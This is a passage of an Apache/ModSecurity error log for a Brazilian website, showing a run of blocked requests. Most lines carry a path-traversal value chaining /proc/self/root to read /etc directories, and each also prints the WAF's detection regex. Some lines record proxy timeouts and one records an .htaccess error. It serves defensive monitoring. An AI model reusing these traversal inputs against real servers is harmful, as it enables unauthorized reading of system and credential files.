"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuIgQohV2v-7oj5HG-KQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:05.304409 2026] [:error] [pid 2304:tid 140411699963648] [client 74.7.241.46:44028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuJch3JZxwdBQwPYG0PgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:07.936109 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.241.46:44044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuJ-82sZHvlq4xgHqDQAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:08.643322 2026] [:error] [pid 2304:tid 140411599251200] [client 74.7.243.203:58484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuKMh3JZxwdBQwPYG0RQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:28:09.699368 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:50542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuKQQohV2v-7oj5HG-KwAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:10.976807 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.46:50544] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuKqBJNF7axNlVR0W8pAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:14.849405 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.241.46:50558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuLgQohV2v-7oj5HG-LgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:23.129827 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60622] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:28:33.612614 2026] [:error] [pid 4740:tid 140411565680384] [client 74.7.241.46:53972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuQQfYLcKp6Sb5AeL2GQAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:35.260323 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.46:41662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuQ6BJNF7axNlVR0W8rwAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:41.827718 2026] [:error] [pid 2325:tid 140411691570944] [client 74.7.241.46:41676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuSe82sZHvlq4xgHqDXQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:43.282887 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.241.46:55524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuS-82sZHvlq4xgHqDXwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:44.555765 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.46:55536] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuTKBJNF7axNlVR0W8uAAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:28:45.131881 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60910] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:29:07.125822 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:32866] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:29:30.141871 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33088] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:29:52.137786 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33330] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:29:56.699948 2026] [:error] [pid 4740:tid 140411632822016] [client 74.7.241.46:55538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiulAfYLcKp6Sb5AeL2VAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:29:58.441699 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.241.46:45926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiulqBJNF7axNlVR0W82wAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:30:14.137333 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33538] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:30:16.044896 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.46:45938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuqKBJNF7axNlVR0W86QAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:30:26.347172 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:45938] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiusqBJNF7axNlVR0W88AAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:30:27.084496 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.243.203:36326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abius-82sZHvlq4xgHqDpgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:30:36.088481 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33772] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:30:48.341340 2026] [:error] [pid 2304:tid 140411708356352] [client 74.7.241.46:42946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiuyMh3JZxwdBQwPYG01wAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:30:55.223983 2026] [core:alert] [pid 4740:tid 140411590858496] [client 66.249.74.169:45946] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Mon Mar 16 22:30:58.125864 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33960] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:31:01.371780 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.241.46:42448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiu1e82sZHvlq4xgHqDuQAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:31:02.716688 2026] [:error] [pid 2325:tid 140411599251200] [client 74.7.241.46:42450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiu1u82sZHvlq4xgHqDvAAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:31:21.139865 2026] [proxy_fcgi:error] [pid 2325:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34178] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:31:43.122089 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34368] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:32:00.841656 2026] [:error] [pid 2305:tid 140411666392832] [client 74.7.241.46:42466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] 